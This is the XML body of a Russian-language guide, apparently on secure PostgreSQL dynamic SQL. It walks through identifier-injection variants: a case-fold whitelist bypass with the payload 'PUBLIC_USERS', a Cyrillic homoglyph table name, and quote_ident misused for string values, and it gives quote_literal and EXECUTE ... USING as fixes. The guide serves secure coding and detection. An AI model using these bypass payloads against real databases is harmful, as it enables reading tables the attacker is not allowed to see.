          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через явный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IF lower(tbl_name) &lt;&gt; ALL(ARRAY['public_users', ...]) THEN  -- БУГ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RAISE EXCEPTION ...;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END IF;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT * FROM %s', quote_ident(tbl_name));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tbl_name = 'PUBLIC_USERS'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lower('PUBLIC_USERS') = 'public_users'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → проходит whitelist.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quote_ident('PUBLIC_USERS')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"PUBLIC_USERS"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (capital, с quotes).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 FROM "PUBLIC_USERS"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → ERROR: relation does not exist (если такой таблицы нет).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Но если в схеме существует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">другая таблица</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с capital name (типичная mistake — миграция из MS SQL Server, где case-sensitive имена не редкость, или legacy schema):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE "PUBLIC_USERS" (id int, sensitive_data text);  -- мигрировал из другого DB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий читает её через payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'PUBLIC_USERS'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Whitelist проверил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который скрыл, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'PUBLIC_USERS'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'public_users'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант B — Unicode homoglyph через quote_ident-passthrough:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL разрешает Unicode characters в identifier (при default-encoding UTF-8).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не нормализует Unicode — Cyrillic 's' (U+0455) валиден как identifier-char. Сценарий:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- В схеме случайно создалась таблица с Cyrillic в имени (mis-paste из документа)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE "uѕers" (id int, password text);  -- Cyrillic 'ѕ' U+0455</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tbl_name = 'uѕers'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cyrillic 's'):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Whitelist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'uѕers' &lt;&gt; ALL(ARRAY['users', ...])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bytes different) → RAISE EXCEPTION.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Но если whitelist через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и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сам whitelist содержит Unicode</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allowed text[] := ARRAY['users', 'articles'];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IF lower(tbl_name) &lt;&gt; ALL(allowed) THEN ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lower('uѕers')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'uѕers'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cyrillic 's' остаётся). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'uѕers' &lt;&gt; ALL(['users', 'articles'])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — TRUE → блокировка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Но если разработчик добавил Unicode-normalize </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только в whitelist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не в input:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">allowed text[] := ARRAY[unicode_normalize('users', 'NFKC')];  -- 'users' (latin)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IF lower(tbl_name) &lt;&gt; ALL(allowed) THEN  -- 'uѕers' (Cyrillic) ≠ 'users' → block</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это всё ещё работает корректно, потому что Cyrillic 's' ≠ Latin 's'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Реальный hole — когда whitelist неполный (разработчик пропустил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"uѕers"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не знает о её существовании</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пропускает её. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">less attack, more «existing typo bug»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — но в context-е identifier injection важно понимать, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">quote_ident не валидирует identifier semantically</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Вариант C — `quote_ident` для значения (mis-use):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- АНТИПАТТЕРН: quote_ident для строкового значения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT * FROM users WHERE name = ' || quote_ident(user_name);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">quote_ident('admin')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(без quotes); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">quote_ident('admin name')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"admin name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с double-quotes). В SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">name = "admin name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сравнение колонки `name` с колонкой `admin name`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не со строковым literal. ERROR: column "admin name" does not exist. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">functionally broken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не уязвимость само по себе, но pattern часто переходит в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-mis-use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Правильно — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">quote_literal('admin name')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'admin name'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (single-quotes) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">name = 'admin name'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (literal). Ещё лучше — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE ... USING $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.16.3) для значений.</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Чтение чужих таблиц через case-fold bypass whitelist (Variant A). Mis-use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для значений → broken queries или потенциальная identifier-collision attack (Variant C). Variant B (Unicode) — теоретическая поверхность, реальная только если в схеме есть Unicode-named tables.</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 FROM "PUBLIC_USERS"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 FROM "uѕers"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — необычные case-mixed или Unicode-quoted имена в EXECUTE-вычисленном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функции с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lower(tbl_name)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unicode_normalize()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
